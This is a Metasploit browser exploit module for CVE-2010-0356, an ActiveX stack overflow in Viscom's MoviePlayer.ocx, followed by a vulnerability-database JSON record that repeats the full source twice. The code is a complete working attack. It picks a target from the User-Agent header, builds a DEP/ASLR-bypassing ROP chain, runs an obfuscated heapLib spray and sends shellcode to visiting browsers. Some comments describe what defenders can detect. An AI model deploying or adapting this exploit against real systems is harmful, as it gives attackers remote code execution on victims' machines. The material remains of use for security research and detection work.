##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
#
# Browser-side exploit module for the DrawText stack overflow in MoviePlayer.ocx
# (CVE-2010-0356, see 'References' below). Once started, the HttpServer::HTML
# mixin calls on_request_uri for every request; that handler serves an HTML page
# which instantiates the control by CLSID, sprays the heap with heapLib, and
# invokes DrawText from VBScript with an oversized strFontName argument.
#
# What a defender sees on the wire (all of it is built in on_request_uri): an
# <object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E'> tag, a
# heapLib-based JavaScript spray and a VBScript block calling `.DrawText` with a
# long string. Per the description the control only loads after the user trusts
# the publisher; a kill bit on that CLSID would block instantiation regardless
# (standard ActiveX hardening, not something this module checks for).
#
Rank = NormalRanking
# Supplies the HTTP server plus rand_text_alpha, heaplib, send_response_html and
# print_status used below.
include Msf::Exploit::Remote::HttpServer::HTML
# Module metadata. The per-target hashes are empty, so all branching in
# on_request_uri is done on the target *name* alone (see `my_target.name`).
def initialize(info = {})
super(update_info(info,
'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',
'Description' => %q{
Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control
in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows
remote attackers to execute arbitrary code via a long strFontName parameter to the
DrawText method.
The victim will first be required to trust the publisher Viscom Software.
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
with Java support.
},
'License' => MSF_LICENSE,
'Author' =>
[
'shinnai', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
],
'Version' => '$Revision: $', # unexpanded SVN keyword: no real version is recorded
'References' =>
[
[ 'CVE', '2010-0356' ],
[ 'OSVDB', '61634' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false', # string, not boolean, as older modules wrote it
'InitialAutoRunScript' => 'migrate -f'
},
# payload.encoded (used in on_request_uri) is limited to 1024 bytes and must
# contain no NUL byte.
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00"
},
'Platform' => 'win',
# Index 1 is the plain return-to-spray path, index 2 adds the ROP pivot/chain;
# index 0 picks one of them from the User-Agent header in on_request_uri.
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows IE6-7', {} ],
[ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
],
'DisclosureDate' => 'Jan 12 2010',
'DefaultTarget' => 0))
# OBFUSCATE (default true) runs the spray script through Rex's JSObfu before it
# is embedded in the page; see on_request_uri.
register_options(
[ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
end
# Prevent module from being executed in autopwn (returning false opts out).
def autofilter
false
end
# use_zlib comes from the HttpServer mixin (not visible here); presumably it
# enables compressed HTTP responses — confirm against the mixin.
def check_dependencies
use_zlib
end
# Returns a pseudo-random 32-bit unsigned integer built from n random alphabetic
# bytes ("L" = native byte order). The pivot chain in on_request_uri calls it
# without arguments, so the default n=4 is what is actually used.
# NOTE(review): for n < 4, unpack("L") yields [nil] and .to_i turns that into 0.
#
# @param n [Integer] number of random bytes to draw (default 4)
# @return [Integer]
def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
end
# HTTP request handler: resolves the target from the User-Agent when
# 'Automatic' is selected, builds the DrawText argument (`sploit`) and the
# sprayed data (`code`), assembles the HTML page and sends it to the client.
#
# @param cli [Rex::Socket] client connection; peerhost/peerport are used for logging
# @param request [Rex::Proto::Http::Request] only the 'User-Agent' header is read
def on_request_uri(cli, request)
# Set target manually or automatically
my_target = target
if my_target.name == 'Automatic'
# NOTE(review): when no OS/browser pair below matches (or the header is
# missing — nil =~ /re/ is nil in Ruby, so there is no crash), my_target stays
# the 'Automatic' entry and the non-IE8 branch further down is taken.
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1] # XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1] # XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # XP
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
my_target = targets[1] # Vista
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # Vista
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # Win7
end
end
# 32 alphabetic filler bytes come first in the strFontName string; the =begin
# dump after the class shows eip=41414141 for an all-'A' run of this kind.
sploit = rand_text_alpha(32)
# Single address used by both branches: the IE8 branch pivots ESP to it, the
# other branch returns to it directly. Presumably chosen to fall inside the
# heapLib spray built below — cannot be confirmed from this file alone.
pivot_addr = 0x1126cfe4
# Branch on the target *name* (see 'Targets' in initialize).
if my_target.name =~ /IE8/
pivot_rop =
[ # Pivot to get to ROP Chain
0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]
pivot_addr,
0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]
junk, # ---------------------^
junk, # ----------------------^
junk, # ----------------------^
junk, # -------------------------------------^
junk, # -------------------------------------^
0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]
].pack("V*")
# The packed pivot chain is appended to the DrawText argument itself.
sploit << pivot_rop
# `code` (what gets sprayed) starts with ROP NOPs, then the MSVCR71 chain, then
# the encoded payload. The addresses are fixed MSVCR71.dll offsets, which is why
# the target description requires Java 6 (that DLL ships with it).
code = [0x7C347F98].pack("V") * 4 # RETN (ROP NOP) [MSVCR71.dll]
code <<
[ # MSVCR71.dll - rop chain generated with mona.py
0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
0x7C347F98, # RETN (ROP NOP)
0x7C3415A2, # JMP [EAX]
0xFFFFFFFF, #
0x7C376402, # Skip 4 bytes
0x7C351E05, # NEG EAX # RETN
0x7C345255, # INC EBX # FPATAN # RETN
0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7C344F87, # POP EDX # RETN
0xFFFFFFC0, # Value to negate, will become 0x00000040
0x7C351EB1, # NEG EDX # RETN
0x7C34D201, # POP ECX # RETN
0x7C38B001, # &Writable location
0x7C347F97, # POP EAX # RETN
0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
0x7C345C30, # Ptr to 'push esp' # ret
].pack("V*")
# Encoded payload (<= 1024 bytes, no NUL; see 'Payload' in initialize).
code << payload.encoded
else
# Non-IE8 path: spray only the payload and return straight into the spray.
code = payload.encoded
sploit << [pivot_addr].pack('V*')
end
# Payload in JS format (%uXXXX escapes consumed by unescape() in the spray).
code = Rex::Text.to_unescape(code)
# heapLib spray: a 0x0c0c NOP sled is padded around `code` into 0x2000-char
# units, grown to a 0x40000-char string, cut to one block, and that block is
# allocated 0x200 times.
spray = <<-JS
var heap_lib = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x800-0x20);
var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x7fb00-6)/2);
heap_lib.gc();
for (var i = 0; i < 0x200; i++) {
heap_lib.alloc(block);
}
JS
# Use heaplib (mixin helper; presumably prepends the heapLib library source to
# the spray script — confirm in the mixin)
js = heaplib(spray)
# Obfuscate on demand. After this `js` is a JSObfu object; it is interpolated
# via #{js} (to_s) into the <script> tag below.
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
# Randomize the javascript variable names (1..100 alphabetic characters each).
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# NOTE(review): `sploit` holds raw packed bytes and is interpolated into the
# VBScript string literal without escaping; this relies on none of the packed
# constants containing a '"' or line-break byte. DrawText is called with the
# oversized string as its sixth argument.
html = %Q|<html>
<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>
<script>#{js}</script>
<script language='vbscript'>
#{strname} = "#{sploit}"
#{vname}.DrawText 1, 1, 1, "", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, html)
end
end
=begin
(78c.1d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4
eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41414141 ?? ???
0:005> dd @esp
0203f300 41414141 41414141 41414141 41414141
0203f310 41414141 41414141 41414141 41414141
0203f320 41414141 41414141 41414141 41414141
0203f330 41414141 41414141 41414141 41414141
0203f340 41414141 41414141 41414141 41414141
0203f350 41414141 41414141 41414141 41414141
0203f360 41414141 41414141 41414141 41414141
0203f370 41414141 41414141 41414141 41414141
=end
{"hash": "987aabbcb53142e9207c1cdf2ba9ec50f1e11697805447413fd035d3bbf1a0dd", "id": "1337DAY-ID-16838", "lastseen": "2018-04-10T04:24:25", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "8b36cc3e59bb3fd4cff37af5066c3110", "key": "href"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "modified"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "4f422d511ffe87a25f47e0a53caa4a02", "key": "sourceData"}, {"hash": "0a6d4fc673ec2975f1dd45edf8f37624", "key": "sourceHref"}, {"hash": "9c82500befb1b39c56a3fdca4d21666a", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-04-10T04:24:25"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-12320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7633", "SECURITYVULNS:DOC:16838"]}], "modified": "2018-04-10T04:24:25"}, "vulnersScore": 0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16838", "description": "Exploit for windows platform in category remote exploits", "title": "Viscom Software Movie Player Pro SDK ActiveX 6.8", "history": [{"bulletin": {"hash": "2ab85803ce08ff85ac4f2dad5cf70908e348a0b59c76c0b1575bba76b1110882", "id": "1337DAY-ID-16838", "lastseen": "2016-04-20T01:53:47", "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2016-04-20T01:53:47"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": 
"6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "9d5390eade0a6839ad0ce1aa741d1283", "key": "sourceHref"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f65b21aeb7ace81f430508af48644d33", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d15ae67001b5ada74d249942007b8d65", "key": "href"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "published"}, {"hash": "dfd6539898e8ef083104ccc44722b86e", "key": "modified"}, {"hash": "9c82500befb1b39c56a3fdca4d21666a", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16838", "description": "Exploit for windows platform in category remote exploits", "viewCount": 0, "title": "Viscom Software Movie Player Pro SDK ActiveX 6.8", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',\r\n 'Description' => %q{\r\n Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\r\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\r\n remote attackers to execute arbitrary code via a long strFontName parameter to the\r\n DrawText method.\r\n \r\n The victim will first be required to trust the publisher Viscom Software.\r\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\r\n with Java support.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'shinnai', # Vulnerability discovery and original exploit\r\n 'TecR0c', # Metasploit module\r\n 'mr_me' # Metasploit module\r\n ],\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0356' ],\r\n [ 'OSVDB', '61634' ],\r\n [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'DisablePayloadHandler' => 'false',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows IE6-7', {} ],\r\n [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]\r\n ],\r\n 'DisclosureDate' => 'Jan 12 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)\r\n end\r\n \r\n # Prevent module from being executed in autopwn\r\n def autofilter\r\n false\r\n end\r\n \r\n def 
check_dependencies\r\n use_zlib\r\n end\r\n \r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"L\")[0].to_i\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n # Set target manually or automatically\r\n my_target = target\r\n if my_target.name == 'Automatic'\r\n agent = request.headers['User-Agent']\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # Vista\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Vista\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Win7\r\n end\r\n end\r\n \r\n sploit = rand_text_alpha(32)\r\n \r\n pivot_addr = 0x1126cfe4\r\n \r\n if my_target.name =~ /IE8/\r\n \r\n pivot_rop =\r\n [ # Pivot to get to ROP Chain\r\n 0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]\r\n pivot_addr,\r\n 0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]\r\n junk, # ---------------------^\r\n junk, # ----------------------^\r\n junk, # ----------------------^\r\n junk, # -------------------------------------^\r\n junk, # -------------------------------------^\r\n 0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]\r\n ].pack(\"V*\")\r\n \r\n sploit << pivot_rop\r\n \r\n code = [0x7C347F98].pack(\"V\") * 4 # RETN (ROP NOP) [MSVCR71.dll]\r\n \r\n code <<\r\n [ # MSVCR71.dll - rop chain generated with mona.py\r\n 0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7C347F98, # RETN (ROP NOP)\r\n 0x7C3415A2, # JMP [EAX]\r\n 0xFFFFFFFF, #\r\n 0x7C376402, # Skip 4 bytes\r\n 0x7C351E05, # NEG EAX # RETN\r\n 0x7C345255, # INC EBX # FPATAN # RETN\r\n 0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # 
RETN\r\n 0x7C344F87, # POP EDX # RETN\r\n 0xFFFFFFC0, # Value to negate, will become 0x00000040\r\n 0x7C351EB1, # NEG EDX # RETN\r\n 0x7C34D201, # POP ECX # RETN\r\n 0x7C38B001, # &Writable location\r\n 0x7C347F97, # POP EAX # RETN\r\n 0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF\r\n 0x7C378C81, # PUSHAD # ADD AL,0EF # RETN\r\n 0x7C345C30, # Ptr to 'push esp' # ret\r\n ].pack(\"V*\")\r\n \r\n code << payload.encoded\r\n else\r\n code = payload.encoded\r\n sploit << [pivot_addr].pack('V*')\r\n end\r\n \r\n # Payload in JS format\r\n code = Rex::Text.to_unescape(code)\r\n \r\n spray = <<-JS\r\n var heap_lib = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{code}\");\r\n var nops = unescape(\"%u0c0c%u0c0c\");\r\n \r\n while (nops.length < 0x2000) nops += nops;\r\n var offset = nops.substring(0, 0x800-0x20);\r\n var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);\r\n \r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x7fb00-6)/2);\r\n \r\n heap_lib.gc();\r\n \r\n for (var i = 0; i < 0x200; i++) {\r\n heap_lib.alloc(block);\r\n }\r\n JS\r\n \r\n # Use heaplib\r\n js = heaplib(spray)\r\n \r\n # Obfuscate on demand\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n # Randomize the javascript variable names\r\n vname = rand_text_alpha(rand(100) + 1)\r\n strname = rand_text_alpha(rand(100) + 1)\r\n \r\n html = %Q|<html>\r\n<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>\r\n<script>#{js}</script>\r\n<script language='vbscript'>\r\n \r\n#{strname} = \"#{sploit}\"\r\n \r\n#{vname}.DrawText 1, 1, 1, \"\", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1\r\n \r\n</script>\r\n</html>\r\n|\r\n print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n \r\n # Transmit the response to the client\r\n send_response_html(cli, html)\r\n end\r\n \r\nend\r\n=begin\r\n(78c.1d8): 
Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4\r\neip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n41414141 ?? ???\r\n \r\n0:005> dd @esp\r\n0203f300 41414141 41414141 41414141 41414141\r\n0203f310 41414141 41414141 41414141 41414141\r\n0203f320 41414141 41414141 41414141 41414141\r\n0203f330 41414141 41414141 41414141 41414141\r\n0203f340 41414141 41414141 41414141 41414141\r\n0203f350 41414141 41414141 41414141 41414141\r\n0203f360 41414141 41414141 41414141 41414141\r\n0203f370 41414141 41414141 41414141 41414141\r\n=end\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-11-19T00:00:00", "references": [], "reporter": "metasploit", "modified": "2011-11-19T00:00:00", "href": "http://0day.today/exploit/description/16838"}, "lastseen": "2016-04-20T01:53:47", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',\r\n 'Description' => %q{\r\n Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\r\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\r\n remote attackers to execute arbitrary code via a long strFontName parameter to the\r\n DrawText method.\r\n \r\n The victim will first be required to trust the publisher Viscom Software.\r\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\r\n with Java support.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'shinnai', # Vulnerability discovery and original exploit\r\n 'TecR0c', # Metasploit module\r\n 'mr_me' # Metasploit module\r\n ],\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0356' ],\r\n [ 'OSVDB', '61634' ],\r\n [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'DisablePayloadHandler' => 'false',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows IE6-7', {} ],\r\n [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]\r\n ],\r\n 'DisclosureDate' => 'Jan 12 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)\r\n end\r\n \r\n # Prevent module from being executed in autopwn\r\n def autofilter\r\n false\r\n end\r\n \r\n def 
check_dependencies\r\n use_zlib\r\n end\r\n \r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"L\")[0].to_i\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n # Set target manually or automatically\r\n my_target = target\r\n if my_target.name == 'Automatic'\r\n agent = request.headers['User-Agent']\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # Vista\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Vista\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Win7\r\n end\r\n end\r\n \r\n sploit = rand_text_alpha(32)\r\n \r\n pivot_addr = 0x1126cfe4\r\n \r\n if my_target.name =~ /IE8/\r\n \r\n pivot_rop =\r\n [ # Pivot to get to ROP Chain\r\n 0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]\r\n pivot_addr,\r\n 0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]\r\n junk, # ---------------------^\r\n junk, # ----------------------^\r\n junk, # ----------------------^\r\n junk, # -------------------------------------^\r\n junk, # -------------------------------------^\r\n 0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]\r\n ].pack(\"V*\")\r\n \r\n sploit << pivot_rop\r\n \r\n code = [0x7C347F98].pack(\"V\") * 4 # RETN (ROP NOP) [MSVCR71.dll]\r\n \r\n code <<\r\n [ # MSVCR71.dll - rop chain generated with mona.py\r\n 0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7C347F98, # RETN (ROP NOP)\r\n 0x7C3415A2, # JMP [EAX]\r\n 0xFFFFFFFF, #\r\n 0x7C376402, # Skip 4 bytes\r\n 0x7C351E05, # NEG EAX # RETN\r\n 0x7C345255, # INC EBX # FPATAN # RETN\r\n 0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # 
RETN\r\n 0x7C344F87, # POP EDX # RETN\r\n 0xFFFFFFC0, # Value to negate, will become 0x00000040\r\n 0x7C351EB1, # NEG EDX # RETN\r\n 0x7C34D201, # POP ECX # RETN\r\n 0x7C38B001, # &Writable location\r\n 0x7C347F97, # POP EAX # RETN\r\n 0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF\r\n 0x7C378C81, # PUSHAD # ADD AL,0EF # RETN\r\n 0x7C345C30, # Ptr to 'push esp' # ret\r\n ].pack(\"V*\")\r\n \r\n code << payload.encoded\r\n else\r\n code = payload.encoded\r\n sploit << [pivot_addr].pack('V*')\r\n end\r\n \r\n # Payload in JS format\r\n code = Rex::Text.to_unescape(code)\r\n \r\n spray = <<-JS\r\n var heap_lib = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{code}\");\r\n var nops = unescape(\"%u0c0c%u0c0c\");\r\n \r\n while (nops.length < 0x2000) nops += nops;\r\n var offset = nops.substring(0, 0x800-0x20);\r\n var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);\r\n \r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x7fb00-6)/2);\r\n \r\n heap_lib.gc();\r\n \r\n for (var i = 0; i < 0x200; i++) {\r\n heap_lib.alloc(block);\r\n }\r\n JS\r\n \r\n # Use heaplib\r\n js = heaplib(spray)\r\n \r\n # Obfuscate on demand\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n # Randomize the javascript variable names\r\n vname = rand_text_alpha(rand(100) + 1)\r\n strname = rand_text_alpha(rand(100) + 1)\r\n \r\n html = %Q|<html>\r\n<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>\r\n<script>#{js}</script>\r\n<script language='vbscript'>\r\n \r\n#{strname} = \"#{sploit}\"\r\n \r\n#{vname}.DrawText 1, 1, 1, \"\", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1\r\n \r\n</script>\r\n</html>\r\n|\r\n print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n \r\n # Transmit the response to the client\r\n send_response_html(cli, html)\r\n end\r\n \r\nend\r\n=begin\r\n(78c.1d8): 
Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4\r\neip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n41414141 ?? ???\r\n \r\n0:005> dd @esp\r\n0203f300 41414141 41414141 41414141 41414141\r\n0203f310 41414141 41414141 41414141 41414141\r\n0203f320 41414141 41414141 41414141 41414141\r\n0203f330 41414141 41414141 41414141 41414141\r\n0203f340 41414141 41414141 41414141 41414141\r\n0203f350 41414141 41414141 41414141 41414141\r\n0203f360 41414141 41414141 41414141 41414141\r\n0203f370 41414141 41414141 41414141 41414141\r\n=end\r\n\r\n\n\n# 0day.today [2018-04-10] #", "published": "2011-11-19T00:00:00", "references": [], "reporter": "metasploit", "modified": "2011-11-19T00:00:00", "href": "https://0day.today/exploit/description/16838"}
